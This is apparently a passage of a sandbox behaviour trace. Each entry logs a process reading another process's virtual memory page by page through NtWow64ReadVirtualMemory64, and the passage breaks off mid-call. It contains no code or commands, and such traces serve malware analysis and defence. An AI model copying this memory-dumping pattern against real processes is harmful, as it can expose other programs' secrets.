0x0 [0135.997] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6b000, Buffer=0x7ffb, BufferSize=0xafb000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.998] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6c000, Buffer=0x7ffb, BufferSize=0xafc000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.998] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6d000, Buffer=0x7ffb, BufferSize=0xafd000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.998] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6e000, Buffer=0x7ffb, BufferSize=0xafe000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.999] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b6f000, Buffer=0x7ffb, BufferSize=0xaff000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.999] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b70000, Buffer=0x7ffb, BufferSize=0xb00000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.999] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b71000, Buffer=0x7ffb, BufferSize=0xb01000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0135.999] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b72000, Buffer=0x7ffb, BufferSize=0xb02000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.000] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b73000, Buffer=0x7ffb, BufferSize=0xb03000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.000] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b74000, Buffer=0x7ffb, BufferSize=0xb04000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.000] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b75000, Buffer=0x7ffb, BufferSize=0xb05000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.000] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b76000, Buffer=0x7ffb, BufferSize=0xb06000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.001] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b77000, Buffer=0x7ffb, BufferSize=0xb07000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.001] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b78000, Buffer=0x7ffb, BufferSize=0xb08000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.001] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b79000, Buffer=0x7ffb, BufferSize=0xb09000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.001] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7a000, Buffer=0x7ffb, BufferSize=0xb0a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.002] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7b000, Buffer=0x7ffb, BufferSize=0xb0b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.002] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7c000, Buffer=0x7ffb, BufferSize=0xb0c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.002] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7d000, Buffer=0x7ffb, BufferSize=0xb0d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.002] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7e000, Buffer=0x7ffb, BufferSize=0xb0e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.002] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b7f000, Buffer=0x7ffb, BufferSize=0xb0f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.003] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b80000, Buffer=0x7ffb, BufferSize=0xb10000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.003] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b81000, Buffer=0x7ffb, BufferSize=0xb11000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.003] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b82000, Buffer=0x7ffb, BufferSize=0xb12000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.003] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b83000, Buffer=0x7ffb, BufferSize=0xb13000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.003] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b84000, Buffer=0x7ffb, BufferSize=0xb14000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.004] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b85000, Buffer=0x7ffb, BufferSize=0xb15000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.004] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b86000, Buffer=0x7ffb, BufferSize=0xb16000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.005] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b87000, Buffer=0x7ffb, BufferSize=0xb17000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.005] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b88000, Buffer=0x7ffb, BufferSize=0xb18000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.005] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b89000, Buffer=0x7ffb, BufferSize=0xb19000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.005] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8a000, Buffer=0x7ffb, BufferSize=0xb1a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.006] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8b000, Buffer=0x7ffb, BufferSize=0xb1b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.006] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8c000, Buffer=0x7ffb, BufferSize=0xb1c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.006] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8d000, Buffer=0x7ffb, BufferSize=0xb1d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.007] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8e000, Buffer=0x7ffb, BufferSize=0xb1e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.007] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b8f000, Buffer=0x7ffb, BufferSize=0xb1f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.007] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b90000, Buffer=0x7ffb, BufferSize=0xb20000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.007] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b91000, Buffer=0x7ffb, BufferSize=0xb21000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.008] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b92000, Buffer=0x7ffb, BufferSize=0xb22000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.008] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b93000, Buffer=0x7ffb, BufferSize=0xb23000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.008] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b94000, Buffer=0x7ffb, BufferSize=0xb24000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.008] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b95000, Buffer=0x7ffb, BufferSize=0xb25000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.009] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b96000, Buffer=0x7ffb, BufferSize=0xb26000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.009] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b97000, Buffer=0x7ffb, BufferSize=0xb27000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.009] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b98000, Buffer=0x7ffb, BufferSize=0xb28000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.010] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b99000, Buffer=0x7ffb, BufferSize=0xb29000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.010] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9a000, Buffer=0x7ffb, BufferSize=0xb2a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.010] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9b000, Buffer=0x7ffb, BufferSize=0xb2b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.010] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9c000, Buffer=0x7ffb, BufferSize=0xb2c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.011] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9d000, Buffer=0x7ffb, BufferSize=0xb2d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.011] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9e000, Buffer=0x7ffb, BufferSize=0xb2e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.011] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b9f000, Buffer=0x7ffb, BufferSize=0xb2f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.011] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba0000, Buffer=0x7ffb, BufferSize=0xb30000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.012] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba1000, Buffer=0x7ffb, BufferSize=0xb31000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.012] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba2000, Buffer=0x7ffb, BufferSize=0xb32000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.012] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba3000, Buffer=0x7ffb, BufferSize=0xb33000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.012] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba4000, Buffer=0x7ffb, BufferSize=0xb34000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.013] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba5000, Buffer=0x7ffb, BufferSize=0xb35000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.013] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba6000, Buffer=0x7ffb, BufferSize=0xb36000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.013] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba7000, Buffer=0x7ffb, BufferSize=0xb37000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.013] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba8000, Buffer=0x7ffb, BufferSize=0xb38000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.014] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28ba9000, Buffer=0x7ffb, BufferSize=0xb39000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.014] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baa000, Buffer=0x7ffb, BufferSize=0xb3a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.014] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bab000, Buffer=0x7ffb, BufferSize=0xb3b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.015] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bac000, Buffer=0x7ffb, BufferSize=0xb3c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.015] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bad000, Buffer=0x7ffb, BufferSize=0xb3d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.015] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bae000, Buffer=0x7ffb, BufferSize=0xb3e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.015] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28baf000, Buffer=0x7ffb, BufferSize=0xb3f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.016] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb0000, Buffer=0x7ffb, BufferSize=0xb40000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.120] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb1000, Buffer=0x7ffb, BufferSize=0xb41000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.120] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb2000, Buffer=0x7ffb, BufferSize=0xb42000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.120] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb3000, Buffer=0x7ffb, BufferSize=0xb43000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.121] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb4000, Buffer=0x7ffb, BufferSize=0xb44000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.121] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb5000, Buffer=0x7ffb, BufferSize=0xb45000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.121] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb6000, Buffer=0x7ffb, BufferSize=0xb46000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.122] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb7000, Buffer=0x7ffb, BufferSize=0xb47000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.122] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb8000, Buffer=0x7ffb, BufferSize=0xb48000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.122] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bb9000, Buffer=0x7ffb, BufferSize=0xb49000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.122] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bba000, Buffer=0x7ffb, BufferSize=0xb4a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.123] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbb000, Buffer=0x7ffb, BufferSize=0xb4b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.123] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbc000, Buffer=0x7ffb, BufferSize=0xb4c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.123] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbd000, Buffer=0x7ffb, BufferSize=0xb4d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.124] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbe000, Buffer=0x7ffb, BufferSize=0xb4e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.124] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bbf000, Buffer=0x7ffb, BufferSize=0xb4f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.124] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc0000, Buffer=0x7ffb, BufferSize=0xb50000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.124] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc1000, Buffer=0x7ffb, BufferSize=0xb51000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.125] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc2000, Buffer=0x7ffb, BufferSize=0xb52000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.125] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc3000, Buffer=0x7ffb, BufferSize=0xb53000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.125] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc4000, Buffer=0x7ffb, BufferSize=0xb54000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.125] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc5000, Buffer=0x7ffb, BufferSize=0xb55000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.126] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc6000, Buffer=0x7ffb, BufferSize=0xb56000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.126] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc7000, Buffer=0x7ffb, BufferSize=0xb57000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.126] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc8000, Buffer=0x7ffb, BufferSize=0xb58000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.126] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bc9000, Buffer=0x7ffb, BufferSize=0xb59000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.127] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bca000, Buffer=0x7ffb, BufferSize=0xb5a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.127] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcb000, Buffer=0x7ffb, BufferSize=0xb5b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.127] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcc000, Buffer=0x7ffb, BufferSize=0xb5c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.127] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcd000, Buffer=0x7ffb, BufferSize=0xb5d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.128] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bce000, Buffer=0x7ffb, BufferSize=0xb5e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.128] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bcf000, Buffer=0x7ffb, BufferSize=0xb5f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.128] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd0000, Buffer=0x7ffb, BufferSize=0xb60000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.128] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd1000, Buffer=0x7ffb, BufferSize=0xb61000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.129] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd2000, Buffer=0x7ffb, BufferSize=0xb62000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.129] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd3000, Buffer=0x7ffb, BufferSize=0xb63000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.129] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd4000, Buffer=0x7ffb, BufferSize=0xb64000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.129] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd5000, Buffer=0x7ffb, BufferSize=0xb65000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.129] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd6000, Buffer=0x7ffb, BufferSize=0xb66000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.130] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd7000, Buffer=0x7ffb, BufferSize=0xb67000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.130] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd8000, Buffer=0x7ffb, BufferSize=0xb68000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.130] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bd9000, Buffer=0x7ffb, BufferSize=0xb69000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.130] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bda000, Buffer=0x7ffb, BufferSize=0xb6a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.131] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdb000, Buffer=0x7ffb, BufferSize=0xb6b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.131] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdc000, Buffer=0x7ffb, BufferSize=0xb6c000, 